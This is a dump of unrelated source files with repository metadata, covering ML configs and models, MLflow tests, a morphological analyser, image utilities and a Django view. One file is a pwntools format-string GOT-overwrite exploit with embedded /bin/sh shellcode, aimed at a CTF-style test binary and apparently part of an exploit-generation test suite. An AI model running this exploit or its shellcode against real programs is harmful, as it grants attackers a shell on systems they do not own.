    description = ''

setup(name='agssearch',
      version='0.4',
      description='Python client for the German Destatis Gemeindeverzeichnis',
      long_description=description,
      author='Marian Steinbach',
      author_email='marian@sendung.de',
      url='https://github.com/marians/agssearch',
      packages=['agssearch'],
      install_requires=[
          'lxml',
          'mechanize'
      ],
      entry_points={
          # Installs the `agssearch` console command.
          'console_scripts': ['agssearch = agssearch.agssearch:main']
      })
| [
"marian@sendung.de"
] | marian@sendung.de |
a650ff2e726fa3c8a71871ebc3fe44fa460c67d6 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /08_FmtString-unit-tests/10_32/verified-exploit-FsGotShellcode.py | 267c686b65001ace4568decd888bfabf4113bbdb | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,583 | py | # +------------------------------------------------+
# | Atack: Format String GOT Shellcode |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf

target = process("./chall-test_FmtString-10-x86")
gdb.attach(target)

bof_payload = sf.BufferOverflow(arch=32)

# Parse the stack address the binary leaks, then compute where the payload's
# format string will sit (fixed 92-byte offset from the leak).
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (92)

# Format-string write targeting 0x804b2d8 (a GOT entry, per the attack
# description in the header comment), redirecting it toward the payload on
# the stack. The exact meaning of value/offset is defined by sf.WriteFmtStr —
# see that helper before changing them.
fs = sf.WriteFmtStr(
    arch = 32,
    value = -0x36,
    address = 0x804b2d8,
    offset = 0x4,
    printed_bytes = 0x0,
    alignment_bytes = 0x0,
    value_base = ret_address,
    address_base = 0)

# Build the buffer: the format string at offset 92 and an x86 /bin//sh
# int-0x80 shellcode at offset 54, then fire it and hand over a shell.
payload = sf.BufferOverflow(arch=32, start=92)
payload.add_bytes(92, fs.generate_fmt_str())
payload.add_bytes(54, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
target.sendline(payload.generate_payload())
target.interactive()
# +------------------------------------------------+
# | Artist: Avenged Sevenfold |
# +------------------------------------------------+
# | Song: Bat Country |
# +------------------------------------------------+
# | Scared but you can follow me |
# | I'm |
# | Too weird to live but much to rare |
# | to die |
# +------------------------------------------------+
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
93366da9c13ccb209b3b624ab0008ae69ab264fb | 80810054516ddc3fd93e916de4bf7e3e07d871b0 | /1-books/book2_TensorFlow实战Google深度学习框架(第二版)/practice/LSTM_test1.py | cbed959b70b74bac7a7f453e2de3150c42bb2b24 | [] | no_license | TinyHandsome/BookStudy | df9ca668f2dd1b51b1e364c22bc531394a03eeae | 69c9018bb70893f74a44e4df9f3d3e39467de3f6 | refs/heads/master | 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# coding=utf-8
"""
@author: Li Tian
@contact: 694317828@qq.com
@software: pycharm
@file: LSTM_test1.py
@time: 2018/12/23 13:37
@desc: LSTM test 1 (book example sketch — lstm_hidden_size, batch_size,
       num_steps, current_input, fully_connected, calc_loss and
       expected_output are assumed to be defined elsewhere)
"""
import tensorflow as tf

# Define an LSTM structure. In TensorFlow a complete LSTM can be created with
# a single call; the variables it uses are declared automatically by this
# function.
lstm = tf.nn.rnn_cell.BasicLSTMCell(lstm_hidden_size)

# Initialize the LSTM state to zeros. BasicLSTMCell provides zero_state() to
# generate the all-zero initial state, an LSTMStateTuple of two tensors:
# state.c and state.h, the cell state and hidden state. As with other
# networks, one batch of training samples is used per optimization step;
# batch_size below is the size of that batch.
state = lstm.zero_state(batch_size, tf.float32)

# Loss accumulated over the unrolled time steps.
loss = 0.0

# At test time an RNN can handle sequences of any length, but for training the
# recurrent network is unrolled into a feed-forward one, so the sequence
# length must be known: num_steps. (Chapter 9 introduces dynamic_rnn for
# variable-length sequences.)
for i in range(num_steps):
    # Declare the LSTM variables at the first time step; all later steps must
    # reuse the variables defined there.
    if i > 0:
        tf.get_variable_scope().reuse_variables()
    # Process one time step: feed the current input (x_t) and the previous
    # state (h_{t-1}, c_{t-1}) into the LSTM, obtaining the output
    # lstm_output (h_t) and the updated state (h_t, c_t). lstm_output feeds
    # other layers; state is carried to the next time step.
    lstm_output, state = lstm(current_input, state)
    # A fully connected layer on top of the LSTM output gives the final output.
    final_output = fully_connected(lstm_output)
    # Loss contribution of the current time step's output.
    loss += calc_loss(final_output, expected_output)

# Train the model using the approach introduced in Chapter 4.
| [
"694317828@qq.com"
] | 694317828@qq.com |
25a74194ca6e00f498d76dc01fac448dabd6dcdc | 5d28c38dfdd185875ba0edaf77281e684c81da0c | /tests/projects/backend/test_local.py | 6d2c431abc4dfb26ae7324c1182734a9f5c5ff01 | [
"Apache-2.0"
] | permissive | imrehg/mlflow | 3a68acc1730b3ee6326c1366760d6ddc7e66099c | 5ddfe9a1b48e065540094d83125040d3273c48fa | refs/heads/master | 2022-09-24T05:39:02.767657 | 2022-09-20T00:14:07 | 2022-09-20T00:14:07 | 244,945,486 | 1 | 0 | Apache-2.0 | 2020-03-04T16:11:54 | 2020-03-04T16:11:53 | null | UTF-8 | Python | false | false | 3,187 | py | import os
from unittest import mock
from mlflow.projects.backend.local import _get_docker_artifact_storage_cmd_and_envs
def test_docker_s3_artifact_cmd_and_envs_from_env():
    """S3 credentials present in the environment are forwarded to the
    container unchanged, with no volume mounts (~/.aws does not exist)."""
    mock_env = {
        "AWS_SECRET_ACCESS_KEY": "mock_secret",
        "AWS_ACCESS_KEY_ID": "mock_access_key",
        "MLFLOW_S3_ENDPOINT_URL": "mock_endpoint",
        "MLFLOW_S3_IGNORE_TLS": "false",
    }
    with mock.patch.dict("os.environ", mock_env), mock.patch(
        "posixpath.exists", return_value=False
    ):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
        assert cmds == []
        assert envs == mock_env
def test_docker_s3_artifact_cmd_and_envs_from_home():
    """Without env credentials but with an existing AWS config directory,
    that directory is volume-mounted into the container at /.aws."""
    mock_env = {}
    with mock.patch.dict("os.environ", mock_env), mock.patch(
        "posixpath.exists", return_value=True
    ), mock.patch("posixpath.expanduser", return_value="mock_volume"):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
        assert cmds == ["-v", "mock_volume:/.aws"]
        assert envs == mock_env
def test_docker_wasbs_artifact_cmd_and_envs_from_home():
    """wasbs:// URIs pass the Azure env credentials through with no mounts
    (BlobServiceClient is patched so no real SDK calls happen)."""
    # pylint: disable=unused-import
    # The import only asserts the azure SDK is installed for this test.
    from azure.storage.blob import BlobServiceClient

    mock_env = {
        "AZURE_STORAGE_CONNECTION_STRING": "mock_connection_string",
        "AZURE_STORAGE_ACCESS_KEY": "mock_access_key",
    }
    wasbs_uri = "wasbs://container@account.blob.core.windows.net/some/path"
    with mock.patch.dict("os.environ", mock_env), mock.patch(
        "azure.storage.blob.BlobServiceClient"
    ):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs(wasbs_uri)
        assert cmds == []
        assert envs == mock_env
def test_docker_gcs_artifact_cmd_and_envs_from_home():
    """The GCP credentials file is mounted at /.gcs and the env var is
    rewritten to point at the in-container path."""
    mock_env = {
        "GOOGLE_APPLICATION_CREDENTIALS": "mock_credentials_path",
    }
    gs_uri = "gs://mock_bucket"
    with mock.patch.dict("os.environ", mock_env, clear=True):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs(gs_uri)
        assert cmds == ["-v", "mock_credentials_path:/.gcs"]
        assert envs == {"GOOGLE_APPLICATION_CREDENTIALS": "/.gcs"}
def test_docker_hdfs_artifact_cmd_and_envs_from_home():
    """The Kerberos ticket cache is mounted at its own path and the HDFS
    related env vars are forwarded unchanged."""
    mock_env = {
        "MLFLOW_KERBEROS_TICKET_CACHE": "/mock_ticket_cache",
        "MLFLOW_KERBEROS_USER": "mock_krb_user",
        "MLFLOW_PYARROW_EXTRA_CONF": "mock_pyarrow_extra_conf",
    }
    hdfs_uri = "hdfs://host:8020/path"
    with mock.patch.dict("os.environ", mock_env, clear=True):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs(hdfs_uri)
        assert cmds == ["-v", "/mock_ticket_cache:/mock_ticket_cache"]
        assert envs == mock_env
def test_docker_local_artifact_cmd_and_envs():
    """A local file: artifact URI mounts ./mlruns into the container's
    project code directory, with no extra environment variables."""
    host_path_expected = os.path.abspath("./mlruns")
    container_path_expected = "/mlflow/projects/code/mlruns"
    cmds, envs = _get_docker_artifact_storage_cmd_and_envs("file:./mlruns")
    assert cmds == ["-v", "{}:{}".format(host_path_expected, container_path_expected)]
    assert envs == {}
def test_docker_unknown_uri_artifact_cmd_and_envs():
    """Unrecognized artifact schemes produce no docker args and no envs."""
    cmd, envs = _get_docker_artifact_storage_cmd_and_envs("file-plugin://some_path")
    assert cmd == []
    assert envs == {}
| [
"noreply@github.com"
] | imrehg.noreply@github.com |
4aa8d69e3fc68379c480897545f8d19475acb2d8 | febeffe6ab6aaa33e3a92e2dbbd75783a4e32606 | /ssseg/cfgs/ce2p/base_cfg.py | 53ab052f882aa2949da132381458f39250509ae2 | [
"MIT"
] | permissive | Junjun2016/sssegmentation | 7bbc5d53abee1e0cc88d5e989e4cff5760ffcd09 | bf7281b369e8d7fc2f8986caaeec3ec38a30c313 | refs/heads/main | 2023-02-04T22:09:13.921774 | 2020-12-23T06:28:56 | 2020-12-23T06:28:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,668 | py | '''base config for ce2p'''
# config for dataset — empty 'type'/'rootdir' values are placeholders,
# presumably filled in by dataset-specific configs; confirm before use.
DATASET_CFG = {
    'train': {
        'type': '',
        'set': 'train',
        'rootdir': '',
        'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}),
                     ('RandomCrop', {'crop_size': (512, 512), 'one_category_max_ratio': 0.75}),
                     ('RandomFlip', {'flip_prob': 0.5}),
                     ('PhotoMetricDistortion', {}),
                     ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
                     ('ToTensor', {}),
                     ('Padding', {'output_size': (512, 512), 'data_type': 'tensor'}),]
    },
    'test': {
        'type': '',
        'set': 'val',
        'rootdir': '',
        # Test-time pipeline: resize + normalize only (no random augmentation).
        'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': None}),
                     ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
                     ('ToTensor', {}),]
    }
}
# config for dataloader
DATALOADER_CFG = {
    'train': {
        'type': ['nondistributed', 'distributed'][1],
        'batch_size': 16,
        'num_workers': 16,
        'shuffle': True,
        'pin_memory': True,
        'drop_last': True,
    },
    'test': {
        'type': ['nondistributed', 'distributed'][1],
        'batch_size': 1,
        'num_workers': 16,
        'shuffle': False,
        'pin_memory': True,
        'drop_last': False,
    }
}
# config for optimizer — None/0 values here (max_iters, num_iters,
# num_epochs, max_epochs) look intended to be filled in at runtime; confirm.
OPTIMIZER_CFG = {
    'type': 'sgd',
    'sgd': {
        'learning_rate': 0.01,
        'momentum': 0.9,
        'weight_decay': 5e-4,
    },
    'max_epochs': 0,
    'params_rules': {},
    'policy': {
        'type': 'poly',
        'opts': {'power': 0.9, 'max_iters': None, 'num_iters': None, 'num_epochs': None}
    },
    'adjust_period': ['iteration', 'epoch'][0],
}
# config for losses — one cross-entropy term per output branch.
LOSSES_CFG = {
    'loss_cls_stage1': {
        'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
    },
    'loss_cls_stage2': {
        'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
    },
    'loss_edge': {
        'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
    }
}
# config for model — num_classes = -1 is a placeholder overridden per dataset.
MODEL_CFG = {
    'type': 'ce2p',
    'benchmark': True,
    'num_classes': -1,
    'align_corners': False,
    'is_multi_gpus': True,
    'distributed': {'is_on': True, 'backend': 'nccl'},
    'norm_cfg': {'type': 'syncbatchnorm', 'opts': {}},
    'act_cfg': {'type': 'leakyrelu', 'opts': {'negative_slope': 0.01, 'inplace': True}},
    'backbone': {
        'type': 'resnet101',
        'series': 'resnet',
        'pretrained': True,
        'outstride': 16,
        'is_use_stem': True
    },
    'ppm': {
        'in_channels': 2048,
        'out_channels': 512,
        'pool_scales': [1, 2, 3, 6],
    },
    'epm': {
        'in_channels_list': [256, 512, 1024],
        'hidden_channels': 256,
        'out_channels': 2
    },
    'shortcut': {
        'in_channels': 256,
        'out_channels': 48,
    },
    'decoder':{
        'stage1': {
            'in_channels': 560,
            'out_channels': 512,
            'dropout': 0,
        },
        'stage2': {
            'in_channels': 1280,
            'out_channels': 512,
            'dropout': 0.1
        },
    },
}
# config for common — empty paths are placeholders set by the launcher.
COMMON_CFG = {
    'train': {
        'backupdir': '',
        'logfilepath': '',
        'loginterval': 50,
        'saveinterval': 1
    },
    'test': {
        'backupdir': '',
        'logfilepath': '',
        'resultsavepath': ''
    }
} | [
"1159254961@qq.com"
] | 1159254961@qq.com |
05d4e7398b6baf2c1f7de7b84f7a6e0e81cb0afb | d8fa0ed226e6dbc0f607961c8b711362942b120a | /maskrcnn_benchmark/modeling/roi_heads/pred_head/roi_pred_predictors.py | 61f4ef46ed49d5168e57a75390aabcbf51111053 | [] | no_license | ltnghia/video-maskrcnn | 70d003f038f82156ec9a8dca4ce1b8ea1190792c | b0bc8eb8b43a8b45335625525eba620b389ba591 | refs/heads/master | 2021-06-19T11:13:29.058747 | 2021-04-01T02:19:07 | 2021-04-01T02:19:07 | 199,971,172 | 8 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,052 | py | from maskrcnn_benchmark.modeling import registry
from torch import nn
import math
import torch
from maskrcnn_benchmark.modeling.make_layers import make_fc
@registry.ROI_PRED_PREDICTOR.register("FastRCNNPredictor")
class FastRCNNPredictor(nn.Module):
    """Prediction head for C4-style ROI features: global average pool
    followed by a single fully-connected scoring layer."""
    def __init__(self, cfg, in_channels):
        # cfg: project config tree; in_channels: channels of the incoming
        # ROI feature map.
        super(FastRCNNPredictor, self).__init__()
        assert in_channels is not None
        num_inputs = in_channels
        num_classes = cfg.MODEL.ROI_PRED_HEAD.NUM_CLASSES
        # Collapse each (C, H, W) ROI feature map to a single C-vector.
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        if num_classes > 0:
            self.pred_score = make_fc(num_inputs, num_classes, use_gn=False)
            # self.pred_score = nn.Linear(num_inputs, num_classes)
            #
            # nn.init.normal_(self.pred_score.weight, mean=0, std=0.01)
            # nn.init.constant_(self.pred_score.bias, 0)
            if cfg.MODEL.ROI_PRED_HEAD.USE_FOCAL_LOSS:
                # bias_init for sigmoid focal loss
                prior_prob = cfg.MODEL.ROI_PRED_HEAD.PRIOR_PROB
                bias_value = -math.log((1 - prior_prob) / prior_prob)
                nn.init.constant_(self.pred_score.bias, bias_value)
            elif cfg.MODEL.ROI_PRED_HEAD.USE_CLASS_BALANCE_LOSS:
                # bias_init for class balance loss
                bias_value = -math.log(num_classes - 1)
                nn.init.constant_(self.pred_score.bias, bias_value)
    def forward(self, x):
        # x: (N, C, H, W) ROI features -> (N, num_classes) logits.
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        pred_logit = self.pred_score(x)
        return pred_logit
@registry.ROI_PRED_PREDICTOR.register("FPNPredictor")
class FPNPredictor(nn.Module):
    """Prediction head for FPN ROI features: one fully-connected scoring
    layer over an already-pooled feature vector."""

    def __init__(self, cfg, in_channels):
        super(FPNPredictor, self).__init__()
        head_cfg = cfg.MODEL.ROI_PRED_HEAD
        num_classes = head_cfg.NUM_CLASSES
        if num_classes > 0:
            self.pred_score = make_fc(in_channels, num_classes, use_gn=False)
            if head_cfg.USE_FOCAL_LOSS:
                # Bias prior initialisation for sigmoid focal loss.
                prior_prob = head_cfg.PRIOR_PROB
                nn.init.constant_(self.pred_score.bias,
                                  -math.log((1 - prior_prob) / prior_prob))
            elif head_cfg.USE_CLASS_BALANCE_LOSS:
                # Bias initialisation for the class-balance loss.
                nn.init.constant_(self.pred_score.bias,
                                  -math.log(num_classes - 1))

    def forward(self, x):
        """Flatten (N, C, 1, 1) inputs if necessary and return class scores."""
        if x.ndimension() == 4:
            assert list(x.shape[2:]) == [1, 1]
            x = x.view(x.size(0), -1)
        return self.pred_score(x)
def make_roi_pred_predictor(cfg, in_channels):
    """Look up the predictor class named by cfg and instantiate it."""
    predictor_cls = registry.ROI_PRED_PREDICTOR[cfg.MODEL.ROI_PRED_HEAD.PREDICTOR]
    return predictor_cls(cfg, in_channels)
| [
"trungnghiadk@gmail.com"
] | trungnghiadk@gmail.com |
fdc61ea92d64ff7e6860e3bbbd86c25e0cf2f2b3 | 44e85fa836a4099478a1c17f920cbd9f8b862ccb | /pos_language_model/morph_analyzer_single_counts_main.py | 57721f417c8fff33874a256f2f433158b4fa7c48 | [] | no_license | yukitomo/jp_robust_morphame_analysis | 7da9c4fdb3a743704d2e5f0acfb1a177c031230e | 6ca8b22a08003da7ce32201f9fe7968b92889643 | refs/heads/master | 2021-01-25T07:28:47.093365 | 2015-04-20T23:51:46 | 2015-04-20T23:51:46 | 27,806,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,823 | py | #!/usr/bin/python
#-*-coding:utf-8-*-
#2015-01-31 Yuki Tomo
import pickle
import math
import jctconv
import string
import sys
from collections import defaultdict
from make_dict_obj import Morph
from morph_analizer_counts import *
def main():
	"""
	posid_unigram_freq : part-of-speech (POS) unigram frequencies
	posid_bigram_freq : POS bigram frequencies
	posid_word_freq : frequencies of POS/word combinations

	Initial values:
	P(c_i|c_i-1) = freq(c_i|c_i-1) / freq(c_i-1)
	P(v|c) = freq(v|c) / freq(c)
	Initial corruption probability 0.01:
	P(w|v) = 0.01
	P(v|v) = 0.99
	v -> w : the expansion patterns are kept as initial values.
	freq(w|v) : kept as zero-frequency entries derived from the MeCab
	dictionary readings.

	Training procedure:
	1. Load the frequencies counted from MeCab analysis (freq_d):
	   freq(c)_d, freq(v)_d, freq(c_i|c_i-1)_d, freq(v|c)_d
	2. Compute the probability values up front:
	   P(c_i|c_i-1), P(v|c)
	3. Analyse erroneous sentences with the current parameters and update
	   the counts (freq_e):
	   freq(c)_e, freq(v)_e, freq(c_i|c_i-1)_e, freq(v|c)_e, freq(w|v)_e
	4. Recompute the probabilities (only the entries whose denominators
	   were updated):
	   P(c_i|c_i-1), P(v|c), P(w|v)
	5. Repeat steps 3 and 4.

	input : a file holding a large number of erroneous Japanese sentences
	"""
	#-------------------------- initial setup ------------------------------------
	# Load the POS-id definitions and the reading/pronunciation dictionary.
	dict_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/data/mecab-ipadic-2.7.0-20070801-utf8/"
	pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
	id_def = load_2colums(open(dict_dir + "left-id.def","r")," ") # MeCab uses the same IDs for left and right contexts
	read_pron_dic = pickle.load(open(pkl_dir + "ipadic_read_pron_dict.pkl", "r"))
	# 1. Load the initial frequencies freq_d
	#    (counted on the Mainichi newspaper corpus).
	pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
	c_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_unigram_counts.pkl","r")) #freq(c)
	cc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_bigram_counts.pkl","r")) #freq(c_i|c_i-1)
	vc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_word_counts.pkl","r")) #freq(v|c)
	#for pos, v_dict in vc_freq_d.items():
	#    for v, freq in v_dict.items():
	#        print pos, v, freq
	#for pos, freq in c_freq_d.items():
	#    print pos, freq
	#dict check
	#print cc_freq_d
	#for k1, v1 in cc_freq_d.items():
	#    for k2, v2 in v1.items():
	#        if k1 == "B":
	#            print k1,k2,v2
	#print vc_freq_d
	# w_v_freq_d does not exist yet; store empty placeholders for now.
	v_freq_d = {}
	wv_freq_d = defaultdict(dict)
	# Store the initial frequencies freq_d in a Freq object.
	freq_d = Freq(c_freq_d, cc_freq_d, vc_freq_d, wv_freq_d, v_freq_d)
	# Initialise the frequencies that the E-step updates (freq_e).
	freq_e = Freq(defaultdict(int), defaultdict(dict), defaultdict(dict), defaultdict(dict), defaultdict(int))
	# 2. Turn the initial frequencies freq_d into probabilities, expressed
	#    as (log-domain) costs.
	cc_cost_e = freq_d.calc_cost("cc", 10)
	vc_cost_e = freq_d.calc_cost("vc", 10)
	wv_cost_e = freq_d.calc_cost("wv", 10)
	# Store the costs in a Cost object.
	cost_dict = Cost(cc_cost_e, vc_cost_e, wv_cost_e)
	#------------------ decoding example with the initial values ----------------------------------
	"""
	#文の入力
	#input_sent = raw_input('input a sentence\n')
	input_sent = "ごはんをたべる。"
	#ラティスの生成
	lm = Lattice_Maker(cost_dict.vc, read_pron_dic, cost_dict.wv, cost_dict.cc, id_def)
	lattice = lm.create_lattice(input_sent)
	#pickle.dump(lattice, open(pkl_dir + "lattice_gohanwotaberu.pkl","w"))
	#ビタビによる最適な系列の決定
	best_sequence = lm.viterbi(lattice)
	#最適系列の出力
	lm.show_best_sequence(best_sequence)
	#最適系列から得られた頻度
	increase_counts = lm.return_best_sequence_counts(best_sequence)
	#コストの更新
	print increase_counts.show_info()
	[cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
	cost_dict.show_info()
	"""
	#-----------------------------------------------------------------------
	#------------------- training ----------------------------------------
	# Read one sentence (a whole file in the eventual design) from stdin.
	input_sent = raw_input('input\n')
	print "input_sent : ", input_sent
	# Build the lattice maker with the updated costs.
	lm = Lattice_Maker(cost_dict, read_pron_dic, id_def)
	# Generate the lattice for the input sentence.
	lattice = lm.create_lattice(input_sent)
	# Decode the best sequence with the Viterbi algorithm.
	best_sequence = lm.viterbi(lattice)
	# Print the best sequence.
	lm.show_best_sequence(best_sequence)
	# Counts collected from the best sequence.
	increase_counts = lm.return_best_sequence_counts(best_sequence)
	# Update the costs from the new counts.
	[cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
# Script entry point: run one load/decode/update pass.
if __name__ == '__main__':
	main()
"over.the.tr0ouble@gmail.com"
] | over.the.tr0ouble@gmail.com |
91e40c70561c19a95bdf6e85872cc990ed29743d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02762/s492187443.py | d50e3beeefcb45621883846f22b51342ddd97ea9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,422 | py | import collections
class UnionFind:
def __init__(self, N):
self.parent = [i for i in range(N)]
self.rank = [0]*N
self.count = 0
def root(self, a):
if self.parent[a]==a:
return a
else:
self.parent[a]=self.root(self.parent[a])
return self.parent[a]
def size(x):
return -par[root(x)]
def is_same(self, a, b):
return self.root(a)==self.root(b)
def unite(self, a, b):
ra = self.root(a)
rb = self.root(b)
if ra == rb: return
if self.rank[ra] < self.rank[rb]:
self.parent[ra] = rb
else:
self.parent[rb] = ra
if self.rank[ra] == self.rank[rb]: self.rank[ra] += 1
self.count += 1
def main():
n,m,k=map(int, input().split())
friend = [0]*n
fr = UnionFind(n)
blocklist = [0]*n
for i in range(m):
a,b = map(int, input().split())
fr.unite(a-1,b-1)
friend[a-1]+=1
friend[b-1]+=1
for i in range(k):
c,d=map(int, input().split())
if(fr.root(c-1)==fr.root(d-1)):
blocklist[c-1]+=1
blocklist[d-1]+=1
res = []
dd = collections.defaultdict(int)
for i in range(n):
dd[fr.root(i)]+=1
for i in range(n):
res.append(dd[fr.root(i)]- blocklist[i] - friend[i]-1)
print(*res)
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2c36910a906c4c9ba81c09a28d3c666e18ad3e0c | b22e40b12e198af858dbf71cdb85f459314c0e37 | /image_utils.py | c721a20228730f3744ad52aa2f9ebe1448380216 | [] | no_license | gauenk/python_modules | 8b40626b566e4fdd7db6fc830255ed3daa34b039 | 632d4813a8e182c74b950d98f3f5b98732d8d6ad | refs/heads/master | 2020-12-15T16:34:42.542568 | 2020-06-09T15:47:43 | 2020-06-09T15:47:43 | 235,180,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,529 | py | import numpy as np
import cv2
def overflowOnly(coordinate,rows,cols):
if 0 > coordinate[0]: coordinate[0] = np.abs(coordinate[0])
elif rows < coordinate[0]: coordinate[0] = rows - coordinate[0]
if 0 > coordinate[1]: coordinate[1] = np.abs(coordinate[1])
elif cols < coordinate[1]: coordinate[1] = cols - coordinate[1]
def zeroInTheRegion(coordinate,rows,cols):
if 0 <= coordinate[0] and coordinate[0] <= rows: coordinate[0] = 0
if 0 <= coordinate[1] and coordinate[1] <= cols: coordinate[1] = 0
def correctTranslatedIndex(coordinate,rows,cols):
zeroInTheRegion(coordinate,rows,cols)
overflowOnly(coordinate,rows,cols)
def getRotationScale(M,rows,cols):
a = np.array([cols,0,1])
b = np.array([0,0,1])
ta = np.matmul(M,a)
tb = np.matmul(M,b)
correctTranslatedIndex(ta,rows,cols)
correctTranslatedIndex(tb,rows,cols)
scale_a_0 = rows / ( 2. * np.abs(ta[0]) + rows )
scale_a_1 = rows / ( 2. * np.abs(ta[1]) + rows )
scale_b_0 = cols / ( 2. * np.abs(tb[0]) + cols )
scale_b_1 = cols / ( 2. * np.abs(tb[1]) + cols )
scale_list = [scale_a_0,scale_a_1,scale_b_0,scale_b_1]
scale = np.min([scale_a_0,scale_a_1,scale_b_0,scale_b_1])
return scale
def getRotationInfo(angle,cols,rows):
rotationMat = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1.0)
scale = getRotationScale(rotationMat,rows,cols)
rotationMat = cv2.getRotationMatrix2D((cols/2,rows/2),angle,scale)
return rotationMat,scale
def rotateImage(img,angle):
# print('angle',angle)
if angle is False:
return img,None
im_shape = img.shape
rows,cols = img.shape[:2]
rotationMat, scale = getRotationInfo(angle,cols,rows)
img = cv2.warpAffine(img,rotationMat,(cols,rows),scale)
rotateInfo = [angle,cols,rows,im_shape]
return img,rotateInfo
def rotateImageList(imageList,angle):
rot_image_list = []
if type(imageList) is list:
for image_index,image in enumerate(imageList):
rot_image,_ = rotateImage(image,angle)
rot_image_list.append(rot_image)
else:
is_single_bw_image_bool = (len(imageList.shape) == 2)
is_single_color_image_bool = (len(imageList.shape) == 3) and (imageList.shape[2] == 3)
if is_single_bw_image_bool or is_single_color_image_bool:
print("actually single image; not list")
rot_image,_ = rotateImage(imageList,angle)
return rot_image
for image_index in range(imageList.shape[0]):
image = np.squeeze(imageList[image_index,...])
rot_image,_ = rotateImage(image,angle)
rot_image_list.append(rot_image)
return rot_image_list
def saveImageList(imageList,prefix_name="save_image",label_string=None):
if type(imageList) is list:
for image_index,image in enumerate(imageList):
if label_string is not None:
filename = "{}_{}_{}.png".format(prefix_name,image_index,label_string[image_index])
else:
filename = "{}_{}.png".format(prefix_name,image_index)
cv2.imwrite(filename,image)
else:
for image_index in range(imageList.shape[0]):
image = np.squeeze(imageList[image_index])
if label_string is not None:
filename = "{}_{}_{}.png".format(prefix_name,image_index,label_string[image_index])
else:
filename = "{}_{}.png".format(prefix_name,image_index)
cv2.imwrite(filename,image)
| [
"kent.gauen@gmail.com"
] | kent.gauen@gmail.com |
afb8c441118da9ce0c7ceb12fc640da170000a66 | d9e8b7d5c468b38cdf18cece9dff12ad1188a71b | /DiscussionForum/Postapp/views.py | 7cf20fbdb26a0e0028127630d851e46d326f9dac | [] | no_license | Ruchika-Munde/Django_Task | f14e0497a4f8045a68dbe58bbd772abf606369d3 | 7fa549842a544527b9f78cbfcf52c26dde31463c | refs/heads/master | 2022-12-16T17:53:12.577323 | 2020-09-09T07:34:43 | 2020-09-09T07:34:43 | 294,036,604 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,502 | py | from django.shortcuts import render,redirect
from Postapp.forms import Addpostform
from Postapp.models import Post
from django.views import View
from Userapp.models import User
from Commentapp.forms import commentform
from Postapp.decorator import user_login
# Create your views here.
#for add post
class base(View):
    """Render the shared base template."""
    def get(self,request):
        return render(request,'base.html')
class Addpost(View):
    """Create a forum post: GET shows the form, POST validates and saves."""
    @user_login
    def get(self,request):
        # Render an empty post form; @user_login requires a session user.
        pform=Addpostform()
        return render (request,'post.html',{'pform':pform})
    def post(self,request,*args,**kwargs):
        # Bind the submitted fields and any uploaded file to the form.
        pform=Addpostform(request.POST,request.FILES)
        if(pform.is_valid()):
            post=Post(title=pform.cleaned_data['title'],description=pform.cleaned_data['description'],ptag=pform.cleaned_data['ptag'])
            if(request.FILES):
